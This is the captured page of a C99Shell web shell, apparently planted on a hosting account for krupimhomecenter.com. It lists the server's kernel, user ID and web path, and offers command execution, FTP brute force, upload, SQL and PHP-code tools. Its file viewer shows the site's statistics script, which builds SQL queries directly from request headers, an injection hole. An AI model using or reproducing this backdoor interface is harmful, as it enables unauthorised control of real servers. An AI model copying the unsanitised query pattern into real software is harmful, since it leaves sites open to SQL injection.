!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/public_html/krupimhomecenter.com/   drwxr-x---
Free 236.11 GB of 981.82 GB (24.05%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index_statistics.php (1.43 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
if (trim($_SERVER[HTTP_ACCEPT_LANGUAGE])!='') {

    
$statistics_online_session     session_id();
    
$statistics_online_time     time();

    
$sql "select * from statistics_online where statistics_online_session = '$statistics_online_session'";
    
$result mysqli_query($con,$sql);
    
$statistics_online_check mysqli_num_rows($result);

    if(
$statistics_online_check ){
        
$statistics_online_sql "UPDATE `statistics_online` SET `statistics_online_time` = '$statistics_online_time' WHERE `statistics_online_session` = '$statistics_online_session'";
        
$statistics_online_qr mysqli_query($con,$statistics_online_sql);
    }
    else{

        
$statistics_online_sql "INSERT INTO `statistics_online` (`statistics_online_session`,`statistics_online_time`) VALUES ('$statistics_online_session','$statistics_online_time')";
        
$statistics_online_qr mysqli_query($con,$statistics_online_sql);

        
$statistics_web_date date('Y-m-d');
        
$statistics_web_sql "INSERT INTO `statistics_web` 
        (`statistics_web_date`,`statistics_web_time`,`statistics_web_ip`, `statistics_web_browser`, `statistics_web_language`) 
        VALUES ('
$statistics_web_date',NOW(),'$_SERVER[REMOTE_ADDR] ','$_SERVER[HTTP_USER_AGENT]','$_SERVER[HTTP_ACCEPT_LANGUAGE]')";
        
$statistics_web_qr mysqli_query($con,$statistics_web_sql);
    }
}


$member_Update "UPDATE `member` SET `member_lastup` =  NOW() WHERE `member_id` = '$_SESSION[member_online_id]'";
$member_Reult mysqli_query($con,$member_Update);

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.1444 ]--